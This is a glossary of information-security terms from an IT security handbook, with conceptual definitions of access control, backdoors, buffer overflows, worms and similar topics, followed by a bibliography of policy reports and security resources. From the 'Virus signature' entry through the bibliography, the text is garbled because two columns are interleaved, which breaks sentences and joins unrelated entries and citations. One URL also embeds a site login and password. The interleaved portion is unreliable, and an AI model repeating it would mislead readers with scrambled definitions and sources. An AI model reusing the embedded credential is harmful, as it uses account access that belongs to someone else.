Permission granted to users, programs, or workstations.

Access control
A set of procedures performed by hardware, software, and administrators to monitor access, identify users requesting access, record access attempts, and grant or deny access. Security policies should be supported by access control, which assists in the prevention of unauthorized use of any of a company's system resources either externally (by an intruder) or internally (by an employee who should not have access).

Accountability
Ensuring that activities on supported systems can be traced to an individual who is held responsible for the integrity of the data.

Assurance
A level of confidence that the information system architecture mediates and enforces the organization's security policy.

Attachment
An attachment is a method by which text and images can be sent via e-mail. Any non-text file (a program or a picture or a video) is converted ("encoded") into a printable form and inserted into the text message. Anything stored in your computer is composed of zeros and ones. Encoding, in its simplest form, would send the zeros and ones as printable characters.

Attack
An assault on system security from an intelligent threat; a deliberate attempt to evade security services and violate the security policy of a system.

Audit
The independent collection of records to assess their veracity and completeness.

Audit trail
An audit trail is a documented record of events allowing an auditor (or security administrator) to reconstruct past system activities; it may be on paper or on disk. In computer security systems, it is a chronological record of when users log in, how long they are engaged in various activities, what they were doing, and whether any actual or attempted security violations occurred.

Authentic signature
A signature, particularly a digital signature, that can be trusted because it can be verified.

Authenticate
In networking, to verify the identity of a user, device, or any other system entity.

Authentication
The process of establishing the legitimacy of a node or user before allowing access to requested information. During the process, the user enters a name or account number (identification) and password (authentication).

Authorization
Granting officially approved access rights to a user, process, or program in accordance with a company's security policy. Usually authorization is completed after the user is authenticated. The user may then be authorized for various levels of access or activity.

Availability
The portion of time a system can be used for productive work.

Backdoor
A way to bypass the normal login security and gain control of a computer without necessarily obtaining the owner's consent. If a backdoor is installed on a network-attached computer, a person anywhere on the Internet may be able to gain control of the computer without your knowledge or approval. A backdoor need not have malicious intent; e.g. operating systems are sometimes shipped by the manufacturer with privileged accounts for use by field service technicians or the vendor's maintenance programmers. However, they may also be used for intrusion by unauthorized persons. Also known as a "trap door".

Backup
The process of copying computer files to some other location either on the computer, or on storage devices that may be separated from the computer. Backups allow you to recover data in the event that the originals are no longer available, for reasons ranging from accidental deletion to physical damage, theft, or other loss.

Bandwidth
Capacity of a network or data connection, often measured in kilobits per second (kbps) for digital transmissions.

Buffer Overflow
A software bug that occurs when a program copies data into a region of memory that is too small to hold it. The excess overwrites whatever lies next to the buffer: other variables, or control data such as a function's return address. Corrupting that memory can cause all sorts of problems, and often lets an attacker who supplies the data influence the integrity or security of the program. Buffer overflows can be avoided (if you are programming) by checking that there is sufficient space in memory before doing a move.

Bulletin board
Allows users from the Internet to write or read messages posted by other users and to exchange programs and files.

CERT
The Computer Emergency Response Team was established at Carnegie-Mellon University after the 1988 Internet worm attack named Morris.

Compromise
Violation of a company's system security policy by an intruder that may result in the modification, destruction, or theft of data.

Computer crime
Any form of illegal act involving electronic information and computer equipment.

Computer fraud
A computer crime that an intruder commits to obtain money or something of value from a company (or individual). Often, all traces of the crime are covered up. Computer fraud typically involves modification, destruction, theft, or disclosure of data.

Confidentiality
Ensuring that sensitive data is limited to specific individuals (external and internal) or groups within an organization. The confidentiality of the information is based on the degree to which an organization must protect its information, for example, registered, proprietary, or nonproprietary.

Conflict-of-interest escalation
A preset procedure for escalating a security incident if any members of the security staff are suspect.

Contingency plan
A security plan to ensure that mission-critical computer resources are available to a company in the event of a disaster (such as an earthquake or flood). It includes emergency response actions, backup operations, and postdisaster recovery.

Control
A protective action that a company takes to reduce its risk of exposure.

Cookie
A file that is written to or read from your hard disk at the request of a remote web site. The web site requests that the file be written and reads it later. As a simple example, if you tell a web site what your username is, it can request that this information be written to your disk. When you go back to that web site, it reads the cookie and knows what your username is. Cookies may be used to generate profiles of web usage habits and, in some cases, may infringe on personal privacy.

Countermeasure
An action that a company takes to reduce threats to a system. A countermeasure can be a hardware device, software package, procedure, and so on.

Cracker
Someone who tries to break the security of, and gain access to, someone else's system without being invited. (See also Hacker.)

Cryptography
The mathematical science that deals with transforming data to render its meaning unintelligible, prevent its undetected alteration, or prevent its unauthorized use. If the transformation is reversible, cryptography also deals with restoring encrypted data to intelligible form.

Data-driven attack
A form of attack that is encoded in innocuous-seeming data executed by a user or other software to implement an attack. Data-driven attacks are a serious concern even to protected systems because they may get through firewalls in data form and launch an attack on the system behind the firewall.

Data Encryption Standard (DES)
An encryption standard developed by IBM and then tested and adopted by the National Bureau of Standards. Published in 1977, the DES standard proved itself over nearly 20 years of use in both government and private sectors. Its 56-bit key is now far too short to resist brute force, and it has been superseded by Triple DES and then by AES.

Data integrity
The assurance that a company's data has not been exposed to modification or destruction either by accident or from malicious acts.

Decode
Conversion of encoded text to plain text through the use of a code.

Decrypt
Conversion of either encoded or enciphered text into plain text.

Dedicated
A special purpose device. Although it is capable of performing other duties, it is assigned to only one.

Defense in depth
The security approach of layering independent controls so that the failure of one does not expose the system: each system on the network is secured to the greatest possible degree rather than relying on a perimeter firewall alone. May be used in conjunction with firewalls.

Denial of service
An attack that prevents legitimate users from using a service. In the common form, computers on the Internet are bombarded with (garbage) messages to such a great extent that they spend all of their time responding to these messages, and real user traffic can no longer get through.

Domain Name Server spoofing
Assuming the Domain Name Server (DNS) name of another system by either corrupting the name service cache of a victim system or compromising a domain name server for a valid domain.

E-mail
The computer-based equivalent of postal mail, e(lectronic)-mail. Properly addressed e-mail can be sent and received by anyone connected to the Internet. From the perspective of the Internet, all e-mail is composed of printable text (ASCII) messages.

E-mail bombs
Code that when executed sends many messages to the same address for the purpose of using up disk space or overloading the e-mail or Web server.

Easy access
Breaking into a system with minimal effort by exploiting a well-known vulnerability, and gaining superuser access in less than 30 seconds (a piece of cake for an intruder).

Eavesdropping
Passive secret wiretapping, i.e. without the knowledge of the originator or the intended recipients of the communication.

Encryption
The process of scrambling files or programs, changing one character string to another through an algorithm (such as the DES algorithm). Encryption is a way to disguise information so that it cannot be read easily, except by the intended recipient. In the simplest case, there is a "key" that is used to disguise that information. It can only be read after being decrypted, and to decrypt it, you would need to know the proper "key".

End-to-end encryption
Encryption at the point of origin in a network, followed by decryption at the destination.

Environment
The aggregate of external circumstances, conditions, and events that affect the development, operation, and maintenance of a system.

Escalation
The procedure of reporting (and passing responsibility for resolving) a security breach to a higher level of command. See also "Internal escalation," "External escalation," and "Conflict-of-interest escalation."

External escalation
The process of reporting a security breach to an individual or group outside the department, division, or company in which it occurred. Once a problem is escalated, responsibility for resolving that problem is either accepted or shared with the party to whom the problem is escalated.

Extranet
Extranet refers to extending the LAN via remote or Internet access to partners outside your organization such as frequent suppliers and purchasers. Such relationships should be over an authenticated link to authorized segments of the LAN and are frequently encrypted for privacy.

Fault tolerance
A design method that ensures continued systems operation in the event of individual failures by providing redundant systems elements.

File compression
File compression is a means of storing or transmitting a large quantity of text, images, or code. Even entire archives may be compressed; in fact, this is a standard backup procedure. Examples of compressed archives include "zip" and "tar" files which can contain very bulky information in a dense form. They are "unzipped" and individual files may be called up through fairly simple processes. There are a number of vendors and some freeware available for file compression.

Firewall
A security system that controls traffic flow between networks. Several configurations exist: filters (or screens), application relays, encryption, demilitarized zones (DMZ), and so on. Firewalls have two forms: a firewall may be a software program running on your computer or it may be a separate piece of hardware that watches what is being sent and received over a network. Firewalls can block transmissions that are unexpected or disallowed. They can also control communications between you and the outside world.

Gateway
A bridge between two networks.

Global System for Mobile Communications (GSM)
GSM is an open, non-proprietary system that is constantly evolving. GSM satellite roaming has extended service access to areas where terrestrial coverage is not available.

Global Positioning System (GPS)
Used primarily for navigation, this satellite-based system maps the location of various receivers on Earth.

Hacker
Someone with an interest in computers who enjoys experimenting with them. The term has also come to mean a person with malicious intentions who gathers information on computer security flaws and breaks into computers without the system owner's permission, although the term cracker is more appropriate for an exclusively negative connotation. (See also Cracker.)

Hacking
In general, writing code for computers. In a security context, the term often is used to mean exploiting system vulnerabilities to gain unauthorized access.

HTML
HyperText Mark-up Language tells a web browser or mail program how to display text and images. It can also give other instructions to the browser/mail program. A mark-up language allows commands or instructions embedded in the text to be displayed and printed. An example of a mark-up language is: This sentence is <>very<> short. When the sentence is displayed, the words within the angle brackets are taken as instructions on what to do. As a result, most of the sentence would be displayed as: This sentence is very short.

Identification
Recognizing users on a company's system by using unique names.

Identity theft
Identity theft is when someone gathers enough information about you to convince others (such as banks, stores or governments) that they are you.

Incident-response procedures
Formal, written procedures that detail the steps to be taken in the event of a major security problem, such as a break-in. Developing detailed incident-response procedures before the occurrence of a problem is a hallmark of a well-designed security system.

Insider attack
An attack originating from inside a protected network.

Internal escalation
The process of reporting a security breach to a higher level of command within the department, division, or company in which the breach occurred.

Internet
A web of different, intercommunicating networks funded by both commercial and government organizations. The Internet had its roots in early 1969 when the ARPANET was formed. ARPA stands for Advanced Research Projects Agency (which was part of the U.S. Department of Defense). One of the goals of ARPANET was research in distributed computer systems for military purposes. The first configuration involved four computers and was designed to demonstrate the feasibility of building networks using computers dispersed over a wide area. The advent of open networks in the late 1980's required a new model of communications. The amalgamation of many types of systems into mixed environments demanded better translators between these operating systems and a non-proprietary approach to networking in general. Transmission Control Protocol/Internet Protocol (TCP/IP) provided the best solutions to this.

Internet Engineering Task Force (IETF)
A public forum that develops standards and resolves operational issues for the Internet.

Internet Service Provider (ISP)
The company through which an individual or organization receives access to the Internet. Typically, ISPs provide e-mail service and home-page storage in addition to Internet access. Some ISPs also provide offsite data storage and backup services.

Intranet
A company's internal network.

Intruder
An entity that gains or attempts to gain access to a system or system resources without having authorization to do so.

Intrusion detection
A security service that monitors and analyzes system events for the purpose of finding, and providing real-time or near real-time warning of, attempts to access system resources in an unauthorized manner.

Intrusion Detection System (IDS)
A system dedicated to the detection of break-ins or break-in attempts, either manually or via software expert systems that operate on logs or other information available on the network.

International Organization for Standardization (ISO)
A group that sets standards for data communications.

Key
In encryption, a key is a sequence of characters used to encode and decode a file. You can enter a key in two formats: alphanumeric and condensed (hexadecimal). In the network access security market, "key" often refers to the "token," or authentication tool, a device utilized to send and receive challenges and responses during the user authentication process. Keys may be small, hand-held hardware devices similar to pocket calculators or credit cards, or they may be loaded onto a PC as copy-protected software.

Keyboard logger
A program that captures everything that is typed on a keyboard. The data can be written to disk or sent to someone else via the Internet. If a keyboard logger is installed on a computer, everything that is entered on the computer, including usernames and passwords, can be captured, just as if someone was looking over your shoulder while you typed!

Least privilege
Designing operational aspects of a system to operate with a minimum amount of system privilege. This design reduces the authorization level at which various actions are performed and decreases the chance that a process or user with high privileges may be caused to perform unauthorized activities resulting in a security breach.

Local Area Network (LAN)
An interconnected system of computers and peripherals. LAN users share data stored on hard disks and can share printers connected to the network.

Logging
The process of storing information about events that occurred on the firewall or network.

Logic bomb
A program inserted into software by an intruder. A logic bomb lies dormant until a predefined condition is met; the program then triggers an unauthorized act.

Log processing
How audit logs are processed, searched for key events, or summarized.

Log retention
How long audit logs are retained and maintained.

Network computer architecture
A computing architecture in which components are dynamically downloaded from the network into the client device for execution by the client. The Java programming language is at the core of network computing.

Network-level firewall
A firewall in which traffic is examined at the network protocol packet level.

Network worm
A program or command file that uses a computer network as a means for adversely affecting a system's integrity, reliability, or availability. A network worm may attack from one system to another by establishing a network connection. The worm is usually a self-contained program that does not need to attach itself to a host file to infiltrate the networks.

Open Source
Programs that are distributed in source format under conditions that allow free modification and distribution. Since the source code is available, people can see how it works and are able to change it. The authors of Open Source code often encourage other programmers to participate in the further development of the programs. Open Source also includes software that is given away for free, and many Open Source programs, both free and for sale, offer functionality that is similar to proprietary programs that may cost a substantial amount of money. Sometimes Open Source programs are incorporated into fee-based programs in special licensing arrangements. See www.opensource.org and www.fsf.org for additional information.

Operating system
System software that controls a computer and its peripherals. Modern operating systems, such as Unix, Linux, and Windows XP, handle many of a computer's basic functions.

Password
A secret code assigned to a user, known by the computer system. Knowledge (and entry) of the user ID and password is often used to authorize that user to access system resources.

Password cracker
A software program containing whole dictionaries that tries to match user passwords.

Password sniffing
Passive wiretapping, usually on a local area network, to gain knowledge of passwords.

Penetration
Successful, repeatable, unauthorized access to a protected system resource.

Penetration test
A system test, often part of system certification, in which evaluators attempt to circumvent the security features of the system and penetrate various layers of system resources.

Perimeter-based security
The technique of securing a network by controlling access to all entry and exit points of the network.

Permissions
The authorized actions a subject can perform with an object (i.e. read, write, modify, or delete).

Personal Identification Number (PIN)
A sequence of numbers or letters that serve to authenticate a user to a system or service. A PIN is similar to a password, but generally pertains to completing financial transactions (bank or credit card accounts) or physical access to a location rather than access to computing resources.

Point of Contact (POC)
The person or persons to whom users and/or system administrators should immediately report a break-in or suspected security breach. The POC is the information-system equivalent of a 911 emergency line.

Policy
Organizational-level rules governing acceptable use of computing resources, security practices, and operational procedures.

Privacy
The protection of a company's data from being read by unauthorized parties. Safeguards such as encryption can provide a level of assurance that the data is protected from exposure.

Private Key
The element of a public/private key pair that is kept secret by the key pair owner. The private key is used to decrypt messages that have been encrypted by the corresponding public key. It is also used to construct a digital signature: the document to be signed is hashed using a secure hash algorithm and then the hashed value is transformed with the private key (in RSA this step is often described as "encrypting" the hash); this process forms the digital signature.

Protocols
Agreed-upon methods of communications used by computers.

Public Key
The element of a public/private key pair that can be known by anyone. The public key is used to encrypt information that is to be intelligible only to the holder of the corresponding private key. It is also used to verify a digital signature, by recovering the signed hash and comparing it with the hashed value of the signed document.

Reliability
The probability that a system will adequately accomplish its tasks for a specific period of time, under the expected operating conditions.

Remote Access
The hookup of a remote computing device via communications lines such as ordinary phone lines or wide area networks to access network applications and information.

Risk
The probability that a particular vulnerability of a system will be exploited, either intentionally or accidentally.

Risk Analysis
The analysis of an organization's information resources, existing controls and computer system vulnerabilities. It establishes a potential level of damage in dollars and/or other assets and identifies controls that need improvement.

Salami Slice
A hacker method for the acquisition of funds. A database of account information is copied. Then on a later date all accounts are charged a minimal amount, so as not to arouse suspicion.

Scalability
The ability to expand a computing solution to support large numbers of users without having an impact on performance.

Security audit
An independent professional security review that tests and examines a company's compliance with existing controls, the results of which enable an auditor to recommend necessary changes in security controls, policies, and procedures.

Security procedures
A set of detailed instructions, configurations, and recommendations to implement a company's security policy.

Server
The control computer on a local area network that controls software access to workstations, printers and other parts of the network.

Smart card
A credit card-sized device with embedded microelectronic circuitry for storing information about an individual. This is not a key or token, as used in the remote access authentication process.

Snapshot
A copy of what a computer's memory (primary storage, specific registers, etc.) contains at a specific point in time, like a photograph. A snapshot can be used to catch intruders by recording information that the hacker may erase before the attack is completed or repelled.

Snooping tool
A program used by an intruder to capture passwords and other data.

Social engineering
An attack based on deceiving users or administrators at the target site. Social engineering attacks are typically carried out by telephoning users or operators and pretending to be an authorized user to attempt to gain access to systems illicitly.

Spam
(Used as a verb, e.g. to spam someone) To indiscriminately send unsolicited, unwanted, irrelevant, or inappropriate messages, especially commercial advertising in mass quantities. (Used as a noun: spam) Electronic "junk mail."

Spoof
To gain access to a system by masquerading as an authorized user.

Stateful evaluation
Methodology using a mixture of proxy or filtering technology intermittently, depending on perceived threats (or the need for speed).

Threat
Any item that has the potential to compromise the integrity, confidentiality, and availability of data.

Tiger team
A group of professional security experts employed by a company to test the effectiveness of security by trying to break in.

Time bomb
A program inserted into software by an intruder that triggers when a particular time is reached or an interval has elapsed.

Token
In authentication, a device used to send and receive challenges and responses during the user authentication process. Tokens may be small, hand-held devices similar to pocket calculators or credit cards.

Total Cost of Ownership (TCO)
A model that helps IT professionals understand and manage the budgeted (direct) and unbudgeted (indirect) costs incurred by acquiring, maintaining, and using an application or a computing system. The TCO normally includes training, upgrades, and administration as well as the original purchase price.

Trap door
Another name for a backdoor; see Backdoor.

Trojan horse
A computer program that appears to have a useful function, but also has a hidden and potentially malicious function that evades security mechanisms, sometimes by exploiting legitimate authorizations of a system entity that invokes the Trojan horse program.

Two-Factor Authentication
Two-factor authentication is based on something a user knows (factor one) plus something the user has (factor two). In order to access a network, the user must have both "factors," just as he/she must have an ATM card and a Personal Identification Number (PIN) to retrieve money from a bank account. In order to be authenticated during the challenge/response process, users must have this specific (private) information.

User
Any person who interacts directly with a computer system.

User ID
A unique character string that identifies a user.

User identification
User identification is the process by which a user identifies himself to the system as a valid user. This is not the same as authentication, which is the process of establishing that the user is who he says he is and has a right to use that system.

User interface
The part of an application that the user works with directly. User interfaces can be text-driven, such as DOS, or graphical, such as Windows.

Username/password
A name and a secret password that identifies a user to a computer system or a web site.

Virtual Private Network (VPN)
A Virtual Private Network (VPN) is a private connection between two machines that sends private data traffic over a shared or public network, the Internet. VPN technology lets an organization securely extend its network services over the Internet to remote users, branch offices, and partner companies.

Virus
Code that is embedded into a computer program. When the program is executed, the viral code wakes up. Once active, a virus can replicate itself, post messages, destroy data, or degrade system performance.

Virus signature
Characteristic marks of a virus that are tracked and fought by security service software vendors. Security
patches are provided routinely by the most active software vendors, including McAfee, Norton (specifically Universal Resource Locator (URL) their security tools including virus protection and Universal Resource Locator ­ a generalized address to firewalls), and Microsoft, which is working to secure locate something in the Internet. Examples are flaws in its systems and programs.. http://www.infodev.org and mailto:infodev@worldbank.org Information Technology Security Handbook GLOSSARY 361 Vulnerability A flaw or weakness in a system's design, ANNEX implementation, or operation that can be exploited by an intruder to violate the system's security policy. ONE Wireless Equivalent Protocol (WEP) Wireless Equivalent Protocol. It was designed to be implemented over WLANs to offer the same security features as a physical wire: confidentiality, access control, and data integrity. Wireless Local Area Network (WLAN) A wireless network that corresponds to wireless laptops or other mobile devices. Wiretapping An attack that intercepts and accesses data and other information contained in a flow in a communication system. Originally, the term applied to a mechanical connection to an electrical conductor. It now refers to reading information from any medium used for a link or even directly from a node, gateway or switch. Worm A computer program that can run independently, can propagate a complete working version of itself onto other hosts on a network, and may consume computer resources destructively, leading to a denial-of-service on that network, or networks. 362 HANDBOOK BIBLIOGRAPHY ANNEX 2. OECD eGovernment: HANDBOOK BIBLIOGRAPHY http://www.oecd.org/EN/about/0,,EN-about-301- nodirectorate-no-no-no-13,00.html This Annex covers resources that were used and cited in the main text of this document. Additional resources OECD ICT policy: will be listed in Annexes 3, 4, and 5. 
http://www.oecd.org/EN/home/0,,EN-home-40- nodirectorate-no-no-no-29,00.html Practical Unix & Internet Security, by Simson Garfinkel, Gene Spafford, and Alan Schwartz (O'Reilly & Associates, Global Internet Policy Initiative: Inc.: CA, 2003) http://www.gipiproject.org/ Web Security, Privacy & Commerce, by Simson Garfinkel Center for Democracy and Technology: with Gene Spafford (O'Reilly & Associates, Inc.: CA, http://www.cdt.org/ and also the eGovernment 2002) handbook pages, completed n collaboration with infoDev: http://www.cdt.org/egov/handbook/ IT Security: Risking the Corporation, by Linda McCarthy, Forward by Gene Spafford (Prentice Hall PTR: NJ, 2003) From the text footnotes for Part 1: PART 1 DOT-Force, http://www.dotforce.org/about/ The future of global policy making site : Draft Declaration of Principles, World Summit on the http://www.markle.org/globalpolicy/index.html Information Society, Document Includes the DOT Force Roadmap and the Louder Voices WSIS03/PCIP/DT/4(Rev.3)-E. Study. Moore, Paxson, Savage, Shannon, Staniford and Weaver, Digital Opportunity Taskforce (DOT) reports: "Inside the Slammer Worm," IEEE Security and Privacy, http://www.dotforce.org/teams Vol. 1, No. 4, July/August 2003, pp. 33-39. Includes material on eStrategies: PART 2 http://www.dotforce.org/reports/documents/65/ E-Strategies_e.pdf The IEEE fosters the development of standards that See also plans for the International e-Development often become national and international standards. The Resource Network: organization publishes a number of journals, has many http://www.dotforce.org/teams/IeDRNBusinessPlan.ppt local chapters, and several large societies in special areas, such as the IEEE Computer Society. 
For further Government guidelines for the development of the information on the IEEE and the IEEE Computer Society, information society: see http://standards.ieee.org and http://www.innovazione.gov.it/eng/documenti/ http://www.computer.org/ linee_guida_eng.shtml Information about definitions and functional OECD Electronic Commerce site: requirements for 802.11 may be found in this document: http://www.oecd.org/EN/home/0,,EN-home-29- http://grouper.ieee.org/groups/802/11/Documents/Docu nodirectorate-no-no-no-29,00.html mentArchives/1992_docs/1192091.DOC OECD Electronic Commerce for Development Study (2002) The Unicode standard was developed to produce http://www.oecd.org/EN/document/0,,EN-document- international software and to process 273-nodirectorate-no-15-36384-29,00.html and render data in most of the world's languages. The following paper presents the background of the Information Technology Security Handbook HANDBOOK BIBLIOGRAPHY 363 development of this standard among vendors and by the http://www.counterpane.com/log-analysis.html contains International Organization for Standardization (ISO). advice and how-to's on The paper describes the design goals and principles. It analyzing system logs. also discusses how an application handles Unicode text. It concludes with a description of some approaches that PART 3 can be taken to support Unicode and a discussion of Microsoft's implementation. Microsoft's decision to use The Human Development Report 2001: Making New Unicode as the native text encoding in its Windows NT Technologies Work for Human Development" (UNDP: NY, (New Technology) operating system is of particular 2001). significance for the success of Unicode. http://research.compaq.com/wrl/DECarchives/DTJ/DTJB0 See a number of works by Glaessner, Kellermann, and ANNEX 2/DTJB02SC.TXT McNevin including "Electronic Safety and Soundness: Securing Finance in a New Age, Public Policy Issues Additional material on the technical aspects of security (October 2003). 
This Monograph is the culmination of may be found at the following links: efforts over the past three years and builds upon a TW series of papers. These include: "Electronic Security: O The Sans Institute Reading room: Risk Mitigation in Financial Transactions" (May 2002, http://www.sans.org/rr/catindex.php?cat_id=48 June 2002, July 2002), "Electronic Finance: A New Approach to Financial Sector Development?" (2002), and http://www.securityfocus.com "Mobile Risk Management: E-Finance in the Wireless Environment" (May 2002). All papers are available at: http://www.sysinternals.com offers a variety of freeware www.worldbank1.org/finance utilities for monitoring (click on E-security). system usage and handling other aspects of systems security. Further material on research projects and security management products is available at the IT Governance http://www.deter.com/unix/index.htmlm is a Unix Institute (ITGI): www.itgi.org. security page. For information on the cases and programs, see the http://msgs.securepoint.com contains mailing lists for a Information Systems Audit and Control Association at: number of popular security tools. www.isaca.org. One such study featured the country of Uruguay which might be of particular interest to readers http://www.cert.org/tech_tips/unix_configuration_guide of this handbook: http://www.isaca.org/ct_case.htm. lines.html offers Unix configuration guidelines from CERT. COBIT (http://www.isaca.org/cobit.htm, or http://www.itgi.org) is an open source product that http://www.cert.org/tech_tips/win_configuration_guidel provides a reference framework on e-Security for ines.html offers Microsoft Windows configuration management, users, and IS audit, control, and security guidelines from CERT. practitioners. 
The latest communication from ISACA will give you a good overview of current and future http://www.cert.org/security- developments of the Association: Volume 8 2003 of improvement/modules/m09.html covers CERT guidelines Global Communiqué: on detecting signs of intrusions. http://ISACF:RESEARCH4@www.isaca.org/@member/gco mm/gcv034.pdf http://sites.inka.de/lina/freefire-l/index.en.html is a link to the FreeFire project Due to the rise in security incidents globally, a number for free security software. of consulting firms have been producing reports on IT in an international context. See, for example, Ernst & 364 HANDBOOK BIBLIOGRAPHY Young recently released the 2003 Global Information The following are several examples of recent work security survey: performed by the ICC: http://www.ey.com/global/download.nsf/US/TSRS_Globa l_Information_Security_Survey_2003/$file/TSRS_- a) Electronic Signatures Directive ­ review and response _Global_Information_Security_Survey_2003.pdf to the European Commission review of the Electronic Signatures Directive, which was submitted to the Information on security issues including survey data on European Commission in September 2003. incidents and organizational responses may be found at the Sans Institute: www.sans.org. b) Draft Privacy Toolkit - The Draft Privacy Toolkit develops the broad approach of ICC to the regulation of InfraGard is an information sharing and analysis effort personal data and suggests the best way to protect serving the interests and combining the knowledge base privacy while allowing business to function effectively of a wide range of members. At its most basic level, and continue to innovate. InfraGard is a cooperative undertaking between the U.S. 
Government (led by the FBI) and an association of c) Draft ICC policy statement on employee privacy, data businesses, academic institutions, state and local law protection and human resources - enforcement agencies, and other participants dedicated This draft policy statement sets out ICC's positions on to increasing the security of United States critical the key issues relating to data protection and human infrastructures. For further information on a wide range resources, and provides recommendations for of security issues, see www.infragard.net. government policy in this area. A second organization focused on a wide range of d) Draft E-terms - E-terms 2004 is ICC's new self- threats to individual. State and national security is the regulatory legal instrument on electronic newly formed Department of Homeland Security in the contracting. The document has been prepared by an United States. The new department's first priority is to informal drafting group. In its current form, the draft protect the nation against further terrorist attacks. model clause is a focused instrument that addresses Component agencies will analyze threats and three identified issues: (i) contract formation; (ii) intelligence, guard U.S. borders and airports, protect confidentiality issues; (iii) evidential value of electronic U.S. critical infrastructure, and coordinate the response records. The clause is limited to issues that are specific of the country for future emergencies. DHS is also for the electronic medium. Thus, E-terms 2004 must be dedicated to protecting the rights of American citizens read in the context of existing conventional contract and enhancing public services, such as natural disaster regulations and rules. assistance and citizenship services, by dedicating offices to these important missions. See, www.dhs.gov. 
Federal Information System Control Manual (FISCAM) offers technical and policy information at: The FBI has recently published a survey on computer www.gao.gov/special.pubs/ai12.19.6.pdf crime: see www.gocsi.com for the main Computer Security Institute website and http://i.cmpnet.com/ The International Standards Organization (ISO) develops gocsi/db_area/pdfs/fbi/FBI2003.pdf for the Survey itself. standards for the information technology sector worldwide. Its code of practice for information security The ICC is an international body whose membership management, ISO/ IEC 17799, transforms the British includes developing countries, the group is engaged Standard BS 7799, which has been adopted in many with research and exchanges on ICT issues such as, e- countries, into an International Standard and it is Commerce, e-security, privacy, and law in the context of expected to become the reference document for codes the Internet. The ICC web site and related pages may be of good practice to ensure secure and trustworthy found at: http://www.iccwbo.org/home/menu_ e-commerce. See documents posted at www.iso.org. electronic_business.asp Information Technology Security Handbook HANDBOOK BIBLIOGRAPHY 365 ADDITIONAL LINKS FOR PARTS 3 AND 4: 2003 Australian Computer Crime and Security Survey FOCUS ON INTERNATIONAL BUSINESS ISSUES CASES AND LEGISLATION Canadian Criminal Code, Part VI, Invasion of Privacy and Part IX, Offences against rights of property. 1) Implementing e-Government - being ready: http://www.audit.nsw.gov.au/guides-bp/e-govt-BPG.pdf) Claessens Stijn, Glaessner Thomas and Klingebiel is an excellent and simple checklist for governments to Daniela, "E-Finance in Emerging Markets: Is implement e-government (20 pages). Of interest: Leapfrogging Possible?" 
chapters on privacy, security, and technology and information management (Audit Office of New-South Commission of the European Communities: Network and Wales, Australia) Information Security: Proposal for A European Policy ANNEX Approach- Brussels, June 6, 2001. 2) Case studies on protecting critical infrastructure through network security may be found at: Commission of the European Communities: Creating a http://www.itu.int/osg/spu/ni/security/index.html. Safer Information Society by Improving the Security of TW Korea and Brazil are featured in the Country Examples. Information Infrastructures and Combating Computer- O related Crime ­ eEurope 2002, Brussels, January 26, 2001. 3) "The government's guidelines for the development of the information society", Minister for Innovation and Department of Justice, Canada: Technologies, Rome, June 2002 is an excellent example www.canada.justice.gc.ca/en/cons/la_al/index.html#toc: on a government approach to setting up a plan for ICT Lawful Access ­ Consultation Document. security. See also, http://www.innovazione.gov.it/eng/documenti/ Dr Chae, Kijoon, "Introduction to Critical Network linee_guida_eng.pdf Infrastructures," May 20-22, 2002, Seoul, Korea. which contains an executive summary on Italy's national plan for ICT security. Dr Lim, Chaeho, "Creating Trust in Critical Network Infrastructures: Korean Case Study." May 20-22, 2002, 4) Reference to Global ICT Policy Themes, Issues and Seoul. 
Venues, including security and privacy may be found at: http://www.markle.org/globalpolicy/ The organization European Union Directive 2000/31/EC - on certain legal focuses on enabling meaningful participation by aspects of information society services, in particular developing-nation stakeholders and features an electronic commerce, in the Internal Market (Directive implementation team on local policy participation from on electronic commerce) the G8 digital opportunity task force, June 2002 European Union Directive 97/33/EC ­ on 5) THE ITU site contains a collection of links to policy Interconnection in Telecommunications. and regulatory web sites: http://www.itu.int/osg/spu/ni/security/links/policy.html European Union Directive 2002/58/EC ­ on privacy and There are also links for development and e-strategy Electronic Communications. issues: http://www.itu.int/ITU-D/e-strategy/internet/ Glaessner, Thomas, Kellerman Tom, and McNevin, The World e-Trust memorandum of understanding: "Electronic Security: Risk Mitigation in Financial http://www.itu.int/ITU-D/e-strategy/MoU/world_e.html, Transactions -Public Policy Issues," June 2002, The and e-Business: A Technology Strategy for Developing World Bank. Countries: http://www.itu.int/ITU-D/e-strategy/publications- Global Dialogue "E-Security: Risk Mitigation in the articles/wmrcjune00/ntoko.html Financial Sector," The World Bank, Integrator Group, September 25, 2002 366 HANDBOOK BIBLIOGRAPHY Goodman E., Seymour, Hassebroek B., Pamela, King, "Security of Internet Enabled Wireless Devices," Wireless Davis and Ozment, Andy, " International Coordination to Task Force Findings, National Security Increase the Security of Critical Network Telecommunications Advisory Committee, January 2003. Infrastructures," May 20-22, 2002, Seoul. Shaw, Robert, "Creating Trust in Critical Network Harrop, Mike, "Creating Trust in Critical Network Infrastructures: The Case of Brazil." 
May 20-22, 2002, Infrastructures ­Canadian Case Study," May 20-22, 2002, Seoul. Seoul, Korea. The National Strategy to Secure Cyberspace, President's International Telecommunications Union- Critical Infrastructure Board, United States, September Telecommunications Standardization Sector (ITU-T) ­ 2002. Lead Study Group 17 on Communications and Systems Security (www.itu.int/ITU-T/) . "Wireless Security," Wireless Task Force Report, National Security Telecommunications Advisory Committee, Internet Security Alliance ­ Common Sense Guide for January 2003. Senior Managers ­ Top Ten Recommended Security Practices, July 2002. PART 4 Keck, Richard and Satola, David, "Entering the Grid Once source on privacy is the annual survey by EPIC and Computing Marketplace ­ A Primer of Key Legal Issues," Privacy International, "Privacy and Human Rights 2003" April 1, 2003. (Sept. 2003) http://www.privacyinternational.org/survey/phr2003/ Kellerman, Thomas, "Mobile Risk Management: E-finance in the Wireless Environment," The World Bank, May 2002. See also, the Global Privacy Report - a lengthy report on privacy conditions around the world, funded by the McCullagh, Declan, "Will Canada's ISPs become spies?" Japanese Ministry of Public Management, Home Affairs, CNET News.com, August 27, 2002. Posts and Telecommunications.,August 14, 2003 http://joi.ito.com/joiwiki/PrivacyReport Monetary Authority of Singapore ­ Technology Risk Management Guidelines for Financial Institutions ­ Links to anti-spam laws and organizations all around February 28, 2003. the world, as well as to articles in law journals analyzing the problem in more depth may be found at: Official Journal of the European Communities ­ Council http://www.spamlaws.com/ Resolution on a common approach and specific actions in the area of network and information security, January WIPO has published a summary of intellectual property 28, 2002. 
